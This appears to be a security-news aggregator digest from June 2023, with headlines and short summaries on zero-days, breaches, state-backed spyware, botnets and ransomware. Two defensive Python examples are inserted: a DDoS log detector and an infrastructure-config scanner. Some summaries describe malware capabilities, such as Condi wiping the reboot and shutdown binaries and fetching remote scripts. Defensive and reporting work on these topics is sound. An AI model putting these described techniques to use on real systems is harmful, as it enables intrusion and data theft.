                Apple fixes zero-days used to deploy Triangulation spyware via iMessage

                exploits
                2023-06-21 https://www.bleepingcomputer.com/news/apple/apple-fixes-zero-days-used-to-deploy-triangulation-spyware-via-imessage/
                Apple addressed three new zero-day vulnerabilities exploited in attacks installing Triangulation spyware on iPhones via iMessage zero-click exploits. [...] "

                Autosummary: The list of affected devices is quite extensive, as the zero-days affect older and newer models, and it includes: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later; and iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation). "


                UPS discloses data breach after exposed customer info used in SMS phishing

                financial
                2023-06-21 https://www.bleepingcomputer.com/news/security/ups-discloses-data-breach-after-exposed-customer-info-used-in-sms-phishing/
                Multinational shipping company UPS is alerting Canadian customers that some of their personal information might have been exposed via its online package look-up tools and abused in phishing attacks. [...] "

                Autosummary: " UPS customers worldwide have been affected by these phishing attacks, as shown by online reports showing the threat actors using their names, phone numbers, and postal codes, as well as info on recent orders. "


                ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks

                exploits
                2023-06-21 https://thehackernews.com/2023/06/scarcruft-hackers-exploit-ably-service.html
                The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previously undocumented wiretapping features, as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center ( "

                Autosummary: It doesn"t end there, for AblyGo is used as a conduit to ultimately execute an information stealer malware dubbed FadeStealer that comes with various features to take screenshots, gather data from removable media and smartphones, log keystrokes, and record microphone. "


                iOttie discloses data breach after site hacked to steal credit cards

                financial industry
                2023-06-21 https://www.bleepingcomputer.com/news/security/iottie-discloses-data-breach-after-site-hacked-to-steal-credit-cards/
                Car mount and mobile accessory maker iOttie warns that its site was compromised for almost two months to steal online shoppers' credit cards and personal information. [...] "

                Autosummary: " iOttie has not shared how many customers were impacted but said that names, personal information, and payment information could have been stolen, including financial account numbers, credit and debit card numbers, security codes, access codes, passwords, and PINs. "


                Exploit released for Cisco AnyConnect bug giving SYSTEM privileges

                exploits
                2023-06-21 https://www.bleepingcomputer.com/news/security/exploit-released-for-cisco-anyconnect-bug-giving-system-privileges/
                Proof-of-concept exploit code is now available for a high-severity flaw in Cisco Secure Client Software for Windows (formerly AnyConnect Secure Mobility Client) that can let attackers elevate privileges to SYSTEM. [...] "

                Autosummary: "


                APT37 hackers deploy new FadeStealer eavesdropping malware

                exploits
                2023-06-21 https://www.bleepingcomputer.com/news/security/apt37-hackers-deploy-new-fadestealer-eavesdropping-malware/
                The North Korean APT37 hacking group uses a new "FadeStealer" information-stealing malware containing a "wiretapping" feature, allowing the threat actor to snoop and record from victims' microphones. [...] "

                Autosummary: In the past, the hackers were known to utilize custom malware called "Dolphin" and "M2RAT" to execute commands and steal data, credentials, and screenshots from Windows devices and even connected mobile phones. "


                Ransomware attackers email bemused students as leverage for a payout

                exploits
                2023-06-21 https://www.malwarebytes.com/blog/news/2023/06/ransomware-attackers-email-bemused-students-as-leverage-for-a-payout

                Categories: Business

                Categories: News

                Tags: students

                Tags: university

                Tags: university of Manchester

                Tags: UoM

                Tags: ransomware

                Tags: blackmail

                Tags: theft

                Tags: pressure

                Tags: leak

                Tags: breach

                We take a look at one group's creative tactics to ensure a payout from a compromised university.

                (Read more...)

                The post Ransomware attackers email bemused students as leverage for a payout appeared first on Malwarebytes Labs.

                "

                Autosummary: As a result, emails like the below are being sent to students: "We have stolen 7TB of data, including confidential personal information from students and staff, research data, medical data, police reports, drug test results, databases, HR documents, finance documents, and more." Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. At time of writing, its cyber incident update page still makes no mention of it: "During the week commencing 6 June, we found out that the University is the victim of a cyber incident." The incident, first discovered on June 6th, involved the likely theft of data by an unauthorised party. "


                Going on vacation soon? Stay one step ahead of travel scammers

                financial
                2023-06-21 https://www.welivesecurity.com/2023/06/21/vacation-stay-step-ahead-travel-scammers/

                From bogus free trips to fake rental homes, here are some of the most common online threats you should look out for both before and during your travels

                The post Going on vacation soon? Stay one step ahead of travel scammers appeared first on WeLiveSecurity

                "

                Autosummary: 2) Clone sites: Phishing emails, texts, and calls and/or online ads might also lure victims into visiting fake airline, vacation or comparison sites designed to impersonate legitimate ones. 3) Discounted tickets/vacations: Cybercriminals sometimes offer heavily discounted deals on vacations, flights, hotels and other packages. According to the UK travel agent trade association ABTA, the most common types of holiday booking fraud involve accommodation, airline tickets, sports and religious trips, and timeshares and vacation clubs. 4) ‘Help’ with international travel documents: Some sites purport to help victims secure a travel visa, passport, international driving permit, or other documents. "


                Malwarebytes launches Reseller Partner Program to drive partner profitability

                exploits
                2023-06-20 https://www.helpnetsecurity.com/2023/06/20/malwarebytes-reseller-partner-program/

                Malwarebytes launched the Malwarebytes Reseller Partner Program. The revamped program is dedicated to helping partners create profitable and consistent business growth through innovative endpoint security solutions and leading channel incentives such as lucrative base and multi-year discounts. “Today’s evolving threat landscape means that organizations are leaning on their partners to be their trusted IT advisors and cybersecurity experts more than ever before,” said Jason Coville, Chief Sales Officer, Malwarebytes. “We believe it is critical to … More

                The post Malwarebytes launches Reseller Partner Program to drive partner profitability appeared first on Help Net Security.

                "

                Autosummary: “At Malwarebytes, if it doesn’t work for our channel partners, it doesn’t work for us,” said Philip Walsh, Channel Account Sales Leader, EMEA. "


                Zyxel patches critical vulnerability in NAS devices (CVE-2023-27992)

                exploits
                2023-06-20 https://www.helpnetsecurity.com/2023/06/20/cve-2023-27992/

                Zyxel has released firmware patches for a critical vulnerability (CVE-2023-27992) in some of its consumer network attached storage (NAS) devices. About CVE-2023-27992: CVE-2023-27992 is an OS command injection flaw that could be triggered remotely by an unauthenticated attacker, via a specially crafted HTTP request. It affects the following Zyxel NAS devices: NAS326 – firmware versions prior to V5.21(AAZF.14)C0; NAS540 – firmware versions prior to V5.21(AATB.11)C0; NAS542 – firmware versions prior to V5.21(ABAG.11)C0. Andrej Zaujec, National … More

                The post Zyxel patches critical vulnerability in NAS devices (CVE-2023-27992) appeared first on Help Net Security.

                "

                Autosummary: "


                ASUS Releases Patches to Fix Critical Security Bugs Impacting Multiple Router Models

                exploits
                2023-06-20 https://thehackernews.com/2023/06/asus-releases-patches-to-fix-critical.html
                Taiwanese company ASUS on Monday released firmware updates to address, among other issues, nine security bugs impacting a wide range of router models. Of the nine security flaws, two are rated Critical and six are rated High in severity. One vulnerability is currently awaiting analysis. The list of impacted products is GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, "

                Autosummary: The list of impacted products is GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400. "


                Illegal shark fin trade: Record haul seized in Brazil

                latam
                2023-06-20 https://www.bbc.co.uk/news/world-latin-america-65953341?at_medium=RSS&at_campaign=KARANGA
                Environmental officers seize the fins of an estimated 11,000 sharks from two companies in Brazil. "

                Autosummary: "


                Ransomware is only getting faster: Six steps to a stronger defense

                exploits
                2023-06-20 https://www.bleepingcomputer.com/news/security/ransomware-is-only-getting-faster-six-steps-to-a-stronger-defense/
                Ransomware encryption speed is crucial because it reduces the time available for an organization to react to a security breach. Included are six crucial steps for protecting your organization from the ever-increasing speed of ransomware attacks. [...] "

                Autosummary: Upon success, Rorschach ransomware, for example, can create a Group Policy that deploys the ransomware to every machine in the domain, even if the attack initially targets only one machine. With data breaches being common, using multiple methods, such as a time-based one-time password (TOTP) or a biometric factor like a fingerprint, will make an attacker's job much harder. Multi-Factor Authentication (MFA): Account compromises can occur, but layering on two-factor (2FA) or multi-factor authentication can help mitigate this risk. "


                New RDStealer malware steals from drives shared over Remote Desktop

                exploits
                2023-06-20 https://www.bleepingcomputer.com/news/security/new-rdstealer-malware-steals-from-drives-shared-over-remote-desktop/
                A cyberespionage and hacking campaign tracked as "RedClouds" uses the custom "RDStealer" malware to automatically steal data from drives shared through Remote Desktop connections. [...] "

                Autosummary: Upon activation, RDStealer enters an infinite loop of calling the "diskMounted" function, which checks for the availability of the C, D, E, F, G, or H drives on the \\tsclient network shares. The Remote Desktop Protocol includes a feature called "device redirection," which allows you to connect your local drives, printers, the Windows clipboard, ports, and other devices to the remote host, where they are then accessible in your remote desktop sessions.


                Russian APT28 hackers breach Ukrainian govt email servers

                rusia-ucrania
                2023-06-20 https://www.bleepingcomputer.com/news/security/russian-apt28-hackers-breach-ukrainian-govt-email-servers/
                A threat group tracked as APT28 and linked to Russia's General Staff Main Intelligence Directorate (GRU) has breached Roundcube email servers belonging to multiple Ukrainian organizations, including government entities. [...]

                Autosummary: In these attacks, the cyber-espionage group (also known as BlueDelta, Fancy Bear, Sednit, and Sofacy) leveraged news about the ongoing conflict between Russia and Ukraine to trick recipients into opening malicious emails that would exploit Roundcube Webmail vulnerabilities to hack into unpatched servers. "


                Over 100,000 ChatGPT accounts stolen via info-stealing malware

                exploits
                2023-06-20 https://www.bleepingcomputer.com/news/security/over-100-000-chatgpt-accounts-stolen-via-info-stealing-malware/
                More than 101,000 ChatGPT user accounts have been compromised by information stealers over the past year, according to dark web marketplace data. [...] "

                Autosummary: Victims distribution (Group-IB) Information stealers are a malware category that targets account data stored on applications such as email clients, web browsers, instant messengers, gaming services, cryptocurrency wallets, and others. "


                Cymulate Exposure Analytics provides users with an attacker’s view of their cyber resilience

                industry
                2023-06-20 https://www.helpnetsecurity.com/2023/06/20/cymulate-exposure-analytics/

                Cymulate released a new solution for organizations to run an informed continuous threat exposure management (CTEM) program. CTEM, a term coined by Gartner, is designed to diagnose the severity of exposures, create an action plan for remediation and facilitate a common language for discussions between business and technical teams. Disparate data sources, point-in-time collection, and lack of business context create challenges for cybersecurity teams to ingest and contextualize exposure data and translate it … More

                The post Cymulate Exposure Analytics provides users with an attacker’s view of their cyber resilience appeared first on Help Net Security.

                "

                Autosummary: Correlated analysis from Cymulate and multi-vendor data that assesses on-premises and cloud attack surfaces, risky assets, attack paths, vulnerabilities, and business impact. Prioritization: vulnerability prioritization and remediation guidance based on multi-vendor aggregated data that is normalized, contextualized, and evaluated against breach feasibility. Validation: analyze exposure severity, security integrity, and effectiveness of remediation from security validation assessment data. Mobilization: utilize Cymulate contextualized data to understand various response outcome options, and establish and track performance against baselines, benchmarks, and risk profiles. “Cymulate has always taken an attacker’s view on cybersecurity defense, and through our experience in breach and attack simulation we have carefully studied the ways attackers creatively exploit vulnerabilities and other exposures driven by human error, misconfiguration, or control weaknesses,” said Avihai Ben-Yossef, CTO of Cymulate.


                Black Kite releases two modeling solutions for ransomware and business interruption scenarios

                exploits ransomware
                2023-06-20 https://www.helpnetsecurity.com/2023/06/20/black-kite-cyber-risk-quantificatio/

                Black Kite released automated cyber risk quantification (CRQ) modeling for ransomware and business interruption scenarios. The new capabilities, which automate the FAIR methodology, extend Black Kite’s data breach CRQ model to provide visibility into all third-party risk scenarios, add environmental, social, and corporate governance (ESG) factors and make it possible to continuously monitor supply chain risk. “Cyber risk quantification provides deeper and more useful insights than a mere security score or rating. Yet, getting it … More

                The post Black Kite releases two modeling solutions for ransomware and business interruption scenarios appeared first on Help Net Security.

                "

                Autosummary: With the launch of two new modeling solutions for ransomware and business interruption scenarios, Black Kite now offers an expanded suite of capabilities to augment its existing risk management offerings: Ransomware scenario modeling : With automated cyber risk quantification modeling for ransomware incidents, customers gain the ability to simulate and analyze the potential consequences of ransomware attacks, allowing for proactive measures and effective response strategies to safeguard critical assets and minimize financial losses. "


                Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices

                exploits
                2023-06-20 https://thehackernews.com/2023/06/zyxel-releases-urgent-security-updates.html
                Zyxel has rolled out security updates to address a critical security flaw in its network-attached storage (NAS) devices that could result in the execution of arbitrary commands on affected systems. Tracked as CVE-2023-27992 (CVSS score: 9.8), the issue has been described as a pre-authentication command injection vulnerability. "The pre-authentication command injection vulnerability in some Zyxel "

                Autosummary: "


                Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer

                exploits
                2023-06-20 https://thehackernews.com/2023/06/experts-uncover-year-long-cyber-attack.html
                A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer. "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News. Evidence gathered by the Romanian "

                Autosummary: " Thus when a new RDP client connection is detected, commands are issued by RDStealer to exfiltrate sensitive data, such as browsing history, credentials, and private keys from apps like mRemoteNG, KeePass, and Google Chrome. "


                Hackers infect Linux SSH servers with Tsunami botnet malware

                exploits
                2023-06-20 https://www.bleepingcomputer.com/news/security/hackers-infect-linux-ssh-servers-with-tsunami-botnet-malware/
                An unknown threat actor is brute-forcing Linux SSH servers to install a wide range of malware, including the Tsunami DDoS (distributed denial of service) bot, ShellBot, log cleaners, privilege escalation tools, and an XMRig (Monero) coin miner. [...] "

                Autosummary: Tsunami botnet"s source code (ASEC) Besides SYN, ACK, UDP, and random flood DDoS attacks, Tsunami also supports an extensive set of remote control commands, including shell command execution, reverse shells, collecting system information, updating itself, and downloading additional payloads from an external source. "


                New Condi malware builds DDoS botnet out of TP-Link AX21 routers

                exploits
                2023-06-20 https://www.bleepingcomputer.com/news/security/new-condi-malware-builds-ddos-botnet-out-of-tp-link-ax21-routers/
                A new DDoS-as-a-Service botnet called "Condi" emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks. [...] "

                Autosummary: Because Condi doesn"t have a persistence mechanism to survive between device reboots, its authors decided to equip it with a wiper for the following files, which prevents the devices from being shut down or restarted: /usr/sbin/reboot /usr/bin/reboot /usr/sbin/shutdown /usr/bin/shutdown /usr/sbin/poweroff /usr/bin/poweroff /usr/sbin/halt /usr/bin/halt For propagation to vulnerable TP-Link routers, the malware scans for public IPs with open ports 80 or 8080 and sends a hardcoded exploitation request to download and execute a remote shell script that infects the new device. "


                VMware warns of critical vRealize flaw exploited in attacks

                exploits
                2023-06-20 https://www.bleepingcomputer.com/news/security/vmware-warns-of-critical-vrealize-flaw-exploited-in-attacks/
                VMware updated a security advisory published two weeks ago to warn customers that a now-patched critical vulnerability allowing remote code execution is being actively exploited in attacks. [...] "

                Autosummary: "


                Honduras prison violence: At least 41 killed in women's jail riot

                industry
                2023-06-20 https://www.bbc.co.uk/news/world-latin-america-65969092?at_medium=RSS&at_campaign=KARANGA
                The country"s president says she will take "drastic measures" after the loss of at least 41 lives. "

                Autosummary: "


                Black Cat ransomware group wants $4.5m from Reddit or will leak stolen files

                exploits ransomware
                2023-06-20 https://www.malwarebytes.com/blog/news/2023/06/black-cat-ransomware-group-wants-4-5m-from-reddit-or-will-leak-stolen-files

                Categories: Business

                Tags: reddit

                Tags: ransom

                Tags: black cat

                Tags: ransomware

                Tags: extortion

                Tags: blackmail

                Tags: data

                Tags: leak

                Tags: breach

                We take a look at news that data stolen from Reddit may be leaked soon unless the site pays a cool $4.5m to keep it offline.


                The post Black Cat ransomware group wants $4.5m from Reddit or will leak stolen files appeared first on Malwarebytes Labs.

                "

                Autosummary: The employee"s credentials were reportedly used to gain access to "some internal docs, code, as well as some internal dashboards and business systems", which exposed "limited contact information" for company contacts and employees, and information about advertisers.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.The February attack, billed as a “sophisticated phishing campaign” by Reddit, involved an attempt to swipe credentials and two-factor authentication tokens. "


                Exploring the role of AI in cybersecurity

                ciber
                2023-06-19 https://www.helpnetsecurity.com/2023/06/19/ai-cybersecurity-role-video/

                In this Help Net Security round-up, we present parts of previously recorded videos from experts in the field that discuss about how AI technologies will impact the cybersecurity industry in the next few years. AI is a powerful tool in cybersecurity, adapting to emerging threats by analyzing data and improving detection. However, ethical considerations, privacy, and adversarial attacks must be addressed to maintain trust. AI will continue to play a vital role in safeguarding digital … More

                The post Exploring the role of AI in cybersecurity appeared first on Help Net Security.

                "

                Autosummary: "


                Three cybersecurity actions that make a difference

                ciber
                2023-06-19 https://www.helpnetsecurity.com/2023/06/19/cybersecurity-programs-improvement/

                Organizations that closely align their cybersecurity programs to business objectives are 18% more likely to achieve target revenue growth and market share and improve customer satisfaction, as well as 26% more likely to lower the cost of cybersecurity breaches/incidents, on average, according to Accenture. Driving successful outcomes The report identifies a group of companies that are leading the way in their cybersecurity efforts. These companies — which Accenture calls “cyber transformers” and account for 30% … More

                The post Three cybersecurity actions that make a difference appeared first on Help Net Security.

                "

                Autosummary: Cyber transformers integrate a cyber risk-based framework into their enterprise risk management program; have their cybersecurity operations and executive leadership agree on the priority of assets and operations to be protected; and consider cybersecurity risk to a great extent when evaluating overall enterprise risk (65% vs. 11%). "


                State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments

                government
                2023-06-19 https://thehackernews.com/2023/06/state-backed-hackers-employ-advanced.html
                Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. "The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign "

                Autosummary: Besides using Mimikatz for credential theft, the threat actor's modus operandi stands out for utilizing other novel methods to steal passwords, conduct lateral movement, and exfiltrate sensitive data, such as: using network providers to execute a malicious DLL that harvests and exports plaintext passwords to a remote server; leveraging an open-source penetration testing toolset called Yasso to spread across the network; and taking advantage of the Exchange Management Shell and PowerShell snap-ins to harvest emails of interest. It's worth pointing out that the use of Exchange PowerShell snap-ins to export mailbox data has been previously reported in the case of a Chinese state-sponsored group dubbed Silk Typhoon (formerly Hafnium), which first came to light in March 2021 in connection with the exploitation of Microsoft Exchange Server.


                Recent Teams, Office outages were caused by cyberattacks: Microsoft

                ciber
                2023-06-19 https://www.computerworld.com/article/3700148/recent-teams-office-outages-were-caused-by-cyberattacks-microsoft.html#tk.rss_security

                Microsoft has confirmed that recent outages to its popular services, including Outlook, Teams, OneDrive, and cloud computing platform Azure, were caused by a DDoS attack by a threat actor that the company tracks as Storm-1359.

                Also known as Anonymous Sudan, Storm-1359 was first detected in January, targeting organizations and government agencies with DDoS attacks and efforts to exfiltrate data. The threat actor was initially assumed to be a “hacktivist” group protesting a controversial outfit at the Melbourne Fashion Week but has since been linked to the Russian state, according to several media reports.


                Autosummary: Different types of layer 7 DDoS attacks: Storm-1359 was observed launching several types of layer 7 DDoS attack traffic, including HTTP(S) floods, cache bypass, and Slowloris.
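
Two of the three layer 7 techniques named above leave a signature in ordinary web server access logs, and the third deliberately does not. The following is an added example, not Microsoft's detection logic: an HTTP flood shows up as a per-client request rate far above anything a browser produces, and a cache-bypass flood shows up as many requests for one path that each carry a different query string, so every one misses the CDN or cache and lands on origin. Slowloris holds connections open with partial headers and never completes a request, so it writes no access-log line at all and has to be found from connection-state telemetry (many half-open connections per source) instead. The log lines are constructed in Combined Log Format; the IPs, paths and thresholds are the example's own assumptions.

```python
# Added example, not Microsoft's detection code: HTTP-flood and cache-bypass
# detection over Combined Log Format access-log lines. All sample traffic below
# is constructed; IPs and paths are made up.
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)


def _ts(s):
    # CLF timestamp, e.g. 20/Jun/2023:10:00:00 +0000
    return datetime.strptime(s, "%d/%b/%Y:%H:%M:%S %z")


def _line(ip, sec, target, status=200):
    return f'{ip} - - [20/Jun/2023:10:00:{sec:02d} +0000] "GET {target} HTTP/1.1" {status} 512'


SAMPLE_LOG = "\n".join(
    # ordinary browsing: a couple of requests per user
    [_line("198.51.100.10", 0, "/"), _line("198.51.100.10", 3, "/docs"), _line("198.51.100.11", 5, "/")]
    # HTTP flood: one client issuing 40 requests for the same page within 10 s
    + [_line("203.0.113.7", i % 10, "/") for i in range(40)]
    # cache bypass: 30 clients, each hitting /api/search with a unique cache-buster
    + [_line(f"203.0.113.{100 + i}", i % 10, f"/api/search?q=abc&cb={i * 7919}") for i in range(30)]
)


def parse(log_text):
    """Yield (ip, time, request-target) for every well-formed CLF line."""
    out = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if m:
            out.append((m["ip"], _ts(m["ts"]), m["target"]))
    return out


def http_flood_sources(log_text, max_rps=2.0, window_seconds=10):
    """Return {ip: requests_in_window} for clients whose request rate over any
    window_seconds span exceeds max_rps."""
    by_ip = defaultdict(list)
    for ip, t, _ in parse(log_text):
        by_ip[ip].append(t)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        for i, start in enumerate(times):  # sliding window over this client's requests
            n = sum(1 for t in times[i:] if (t - start).total_seconds() < window_seconds)
            if n / window_seconds > max_rps:
                flagged[ip] = n
                break
    return flagged


def cache_bypass_paths(log_text, min_requests=20, min_unique_ratio=0.9):
    """Return {path: unique_query_ratio} for paths where nearly every request
    carries a distinct query string, the shape of a cache-busting flood."""
    queries = defaultdict(list)
    for _, _, target in parse(log_text):
        parts = urlsplit(target)
        queries[parts.path].append(parts.query)
    return {
        path: len(set(qs)) / len(qs)
        for path, qs in queries.items()
        if len(qs) >= min_requests and len(set(qs)) / len(qs) >= min_unique_ratio
    }
```

The two rules are deliberately different shapes: the flood rule keys on the source, which is why it catches the single noisy client and not the distributed cache-bypass traffic, while the cache-bypass rule keys on the target and ignores sources altogether, because that attack is spread thin across many addresses by design. The usual mitigation for the latter is to normalise or strip unknown query parameters at the edge so the cache key no longer changes per request.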


                ESET PROTECT Elite protects users against ransomware and zero-day threats

                exploits ransomware
                2023-06-19 https://www.helpnetsecurity.com/2023/06/19/eset-protect-elite/

                ESET expanded its unified cybersecurity platform, ESET PROTECT, with a new subscription tier for businesses requiring all-in-one prevention, detection and response. Available immediately, ESET PROTECT Elite delivers enterprises, small and midsize businesses (SMBs), and channel partners with enterprise-grade XDR for increased visibility and threat-hunting capabilities. The comprehensive offering combines multilayered endpoint protection with multi-factor authentication, server security, advanced threat defense, full disk encryption, mail security and cloud application protection. Leveraging ESET’s 30 years of cutting-edge … More

                The post ESET PROTECT Elite protects users against ransomware and zero-day threats appeared first on Help Net Security.

                "

                Autosummary: ESET’s unified cybersecurity platform, ESET PROTECT, is a single-pane-of-glass console – available via the cloud and on prem – that provides centralized visibility, management, and insight. The comprehensive offering combines multilayered endpoint protection with multi-factor authentication, server security, advanced threat defense, full disk encryption, mail security and cloud application protection. "


                A third MOVEit vulnerability fixed, Cl0p lists victim organizations (CVE-2023-35708)

                exploits
                2023-06-19 https://www.helpnetsecurity.com/2023/06/19/cve-2023-35708/

                Progress Software has asked customers to update their MOVEit Transfer installations again, to fix a third SQL injection vulnerability (CVE-2023-35708) discovered in the web application in less than a month. Previously, the Cl0p cyber extortion gang exploited CVE-2023-34362 to grab enterprise data, and Huntress researchers discovered CVE-2023-35036 after partnering with Progress to perform a code review of the web app. About CVE-2023-35708 CVE-2023-35708 is a vulnerability that could lead to escalated privileges and unauthorized access. … More

                The post A third MOVEit vulnerability fixed, Cl0p lists victim organizations (CVE-2023-35708) appeared first on Help Net Security.

                "

                Autosummary: "


                Introducing AI-guided Remediation for IaC Security / KICS

                industry
                2023-06-19 https://thehackernews.com/2023/06/introducing-ai-guided-remediation-for.html
                While the use of Infrastructure as Code (IaC) has gained significant popularity as organizations embrace cloud computing and DevOps practices, the speed and flexibility that IaC provides can also introduce the potential for misconfigurations and security vulnerabilities.  IaC allows organizations to define and manage their infrastructure using machine-readable configuration files, which are "

                Autosummary: Common types of misconfigurations: common misconfigurations include weak access controls, improperly exposed ports, insecure network configurations, or mismanaged encryption settings. For example, improperly configured firewall rules, open ports, or lack of network segmentation can lead to unauthorized access, network attacks, or data exfiltration. Secrets, such as API keys, database passwords, or encryption keys, are sensitive pieces of information that should never be exposed or shared inadvertently.
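
The misconfiguration classes listed above are exactly what an IaC scanner such as KICS looks for, and each is a small, mechanical check. The following is an added example, not KICS or Checkmarx code: three checks over a Terraform-style resource list, flagging a security group that opens an administrative port to the world, storage with encryption switched off, and a hard-coded secret in a resource argument. The JSON input is a simplified, hypothetical rendering of resources constructed for the example; a real scanner parses HCL or the output of `terraform show -json`, and the port list and key patterns are the example's own assumptions.

```python
# Added example, not KICS code: three IaC misconfiguration checks over a
# simplified, hypothetical Terraform-style resource list. The sample resources,
# port list and secret-key patterns are constructed for the example.
import json
import re

SAMPLE_RESOURCES = json.dumps([
    {"type": "aws_security_group", "name": "bastion", "values": {
        "ingress": [
            {"from_port": 22, "to_port": 22, "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]},
            {"from_port": 443, "to_port": 443, "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]},
        ]}},
    {"type": "aws_security_group", "name": "internal", "values": {
        "ingress": [{"from_port": 22, "to_port": 22, "protocol": "tcp", "cidr_blocks": ["10.0.0.0/8"]}]}},
    {"type": "aws_ebs_volume", "name": "data", "values": {"encrypted": False}},
    {"type": "aws_db_instance", "name": "app", "values": {"password": "Summer2023!", "storage_encrypted": True}},
])

# Ports that should never be reachable from the whole internet (example list)
ADMIN_PORTS = {22, 3389, 5432, 3306, 1433, 6379, 27017}
SECRET_KEYS = re.compile(r"(password|secret|token|api_key|private_key)", re.IGNORECASE)
WORLD = {"0.0.0.0/0", "::/0"}


def check_open_admin_ports(res):
    """Flag ingress rules that expose an admin port (or every port) to 0.0.0.0/0 or ::/0."""
    findings = []
    for rule in res.get("values", {}).get("ingress", []):
        if not WORLD & set(rule.get("cidr_blocks", [])):
            continue
        lo, hi = rule.get("from_port", 0), rule.get("to_port", 65535)
        exposed = sorted(p for p in ADMIN_PORTS if lo <= p <= hi)
        if exposed or (lo == 0 and hi == 65535):
            detail = f"ports {exposed or 'all'} open to the world"
            findings.append(("open_admin_port", f"{res['type']}.{res['name']}", detail))
    return findings


def check_unencrypted_storage(res):
    """Flag storage resources whose encryption flag is explicitly false."""
    values = res.get("values", {})
    for key in ("encrypted", "storage_encrypted"):
        if key in values and values[key] is False:
            return [("unencrypted_storage", f"{res['type']}.{res['name']}", f"{key} = false")]
    return []


def check_hardcoded_secrets(res):
    """Flag secret-looking arguments given as literal strings rather than references."""
    findings = []
    for key, val in res.get("values", {}).items():
        if SECRET_KEYS.search(key) and isinstance(val, str) and val and not val.startswith("${"):
            findings.append(("hardcoded_secret", f"{res['type']}.{res['name']}", f"literal value in '{key}'"))
    return findings


def scan(resources_json):
    """Run every check over every resource; returns [(rule, resource, detail)]."""
    findings = []
    for res in json.loads(resources_json):
        for check in (check_open_admin_ports, check_unencrypted_storage, check_hardcoded_secrets):
            findings.extend(check(res))
    return findings
```

The point of running this in CI rather than after deployment is in the third check: once "Summer2023!" is committed, rotating it is the only remediation, whereas a scanner that fails the pull request keeps the literal out of history entirely. The HTTPS rule on the bastion group is left alone on purpose, since a world-open 443 is usually intended; the check is about which ports are open, not whether anything is.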


                EU member states are urged to restrict without delay 5G equipment from risky suppliers

                government
                2023-06-19 https://securityaffairs.com/147617/laws-and-regulations/eu-restrict-5g-risky-suppliers.html

                The European Commission has urged member states to restrict “without delay” equipment from high-risk suppliers in their 5G networks, with a specific focus on reducing dependency on the Chinese firms Huawei and ZTE. […]

                The post EU member states are urged to restrict without delay 5G equipment from risky suppliers appeared first on Security Affairs.

                "

                Autosummary:


                Malwarebytes issues fix for Chrome broken by Windows 11 KB5027231

                exploits
                2023-06-19 https://www.bleepingcomputer.com/news/microsoft/malwarebytes-issues-fix-for-chrome-broken-by-windows-11-kb5027231/
                Malwarebytes released a fix for a known issue breaking Google Chrome on its customers' systems after installing the Windows 11 22H2 KB5027231 cumulative update released last week. [...]

                Autosummary: " While a fix is yet to be released by Cisco and WatchGuard, affected customers are advised to toggle off anti-exploit protection or set Chrome as the default web browser from Settings > Select Default Browser to revive the web browser on impacted Windows 11 systems. "


                Hackers use fake OnlyFans pics to drop info-stealing malware

                exploits industry
                2023-06-19 https://www.bleepingcomputer.com/news/security/hackers-use-fake-onlyfans-pics-to-drop-info-stealing-malware/
                A malware campaign is using fake OnlyFans content and adult lures to install a remote access trojan known as "DcRAT," allowing threat actors to steal data and credentials or deploy ransomware on the infected device. [...] "

                Autosummary: OnlyFans is a content subscription service where paid subscribers can access private photos, videos, and posts from adult models, celebrities, and social media personalities. "


                New Mystic Stealer Malware Targets 40 Web Browsers and 70 Browser Extensions

                exploits
                2023-06-19 https://thehackernews.com/2023/06/new-mystic-stealer-malware-targets-40.html
                A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic "

                Autosummary: First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "


                Iowa’s largest school district confirms ransomware attack, data theft

                exploits ransomware
                2023-06-19 https://www.bleepingcomputer.com/news/security/iowas-largest-school-district-confirms-ransomware-attack-data-theft/
                Des Moines Public Schools, Iowa's largest school district, confirmed today that a ransomware attack was behind an incident that forced it to take all networked systems offline on January 9, 2023. [...]

